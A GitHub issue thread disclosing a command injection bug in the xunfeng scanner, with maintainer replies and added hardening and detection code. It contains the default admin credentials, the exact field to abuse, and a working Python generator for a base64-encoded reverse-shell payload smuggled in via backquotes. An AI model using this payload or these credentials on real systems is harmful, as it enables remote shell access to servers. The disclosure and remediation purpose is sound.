Found command injection vulnerability #176

Closed
gsfish opened this issue Sep 11, 2018 · 2 comments

Comments

@gsfish
Contributor

gsfish commented Sep 11, 2018

An attacker can execute arbitrary commands on the xunfeng server after login; the default account is admin:xunfeng321.

Use the following Python function to generate the payload for bouncing a command shell, paste it into 配置 > 爬虫引擎 > 启用MASSCAN > 速率 and set the scan mode to 1 (changing 资产探测周期 may shorten the waiting time).

```python
import base64  # required by the function below; missing from the original snippet


def get_payload(ip, port):
    # Python one-liner that connects back to ip:port and attaches /bin/sh to the socket
    getshell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{0}",{1}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'.format(ip, port)
    # base64-encode it so no quoting characters remain in the submitted value
    getshell = base64.b64encode(getshell.encode('utf-8')).decode('utf-8')
    payload = 'python -c \'exec __import__("base64").b64decode("{0}")\''.format(getshell)
    # wrap in backquotes: the rate field is interpolated into a shell command unescaped
    payload = '2000`{0}`0'.format(payload)
    return payload
```

The root cause is in nascan/plugin/masscan.py lines 9 & 10, which fail to escape the backquote character `.

Demo: https://asciinema.org/a/YMUpLsKMHHUSOG9hrTCrFNo9p
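A defender's view of the bug class in this report, as an added example that is not xunfeng's code (the real nascan/plugin/masscan.py is not reproduced here): the string-interpolated command construction that lets a backquote in the rate field reach the shell, beside a hardened version that validates the rate as a plain integer and passes an argument list to subprocess with no shell involved. The function names, the regex and the masscan flags are assumptions.

```python
import re
import subprocess

# Assumption: a scan rate is a positive integer of at most seven digits.
ALLOWED_RATE = re.compile(r"^[1-9][0-9]{0,6}$")


def build_cmd_unsafe(target, rate):
    """Vulnerable pattern (constructed illustration): user-controlled values
    interpolated into a shell string. Escaping ; | & is not enough, because
    backquotes (and $(...)) still trigger command substitution in the shell."""
    return "masscan %s -p1-65535 --rate %s" % (target, rate)


def validate_rate(rate):
    """Reject anything that is not a plain positive integer."""
    rate = str(rate).strip()
    if not ALLOWED_RATE.match(rate):
        raise ValueError("rate must be a positive integer, got %r" % rate)
    return int(rate)


def build_cmd_safe(target, rate):
    """Hardened form: validated value and an argv list, so no shell parses it."""
    return ["masscan", target, "-p1-65535", "--rate", str(validate_rate(rate))]


def run_safe(target, rate):
    """shell=False (the default) hands the argv list straight to execve."""
    return subprocess.run(build_cmd_safe(target, rate), capture_output=True)


def looks_injected(value):
    """Detection helper for audit logs or form handlers: flag values carrying
    shell metacharacters that enable substitution or command chaining."""
    return re.search(r"[`$;|&<>\n]", str(value)) is not None
```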

@neargle
Member

neargle commented Sep 11, 2018

Nice demo and exploit.
But it is one of our longstanding bugs. Look at #175 and #134, and see the words by ywolf, who is the main collaborator of XUNFENG.

@gsfish
Contributor Author

gsfish commented Sep 11, 2018

Maybe it wouldn't be a bug combined with CSRF #177
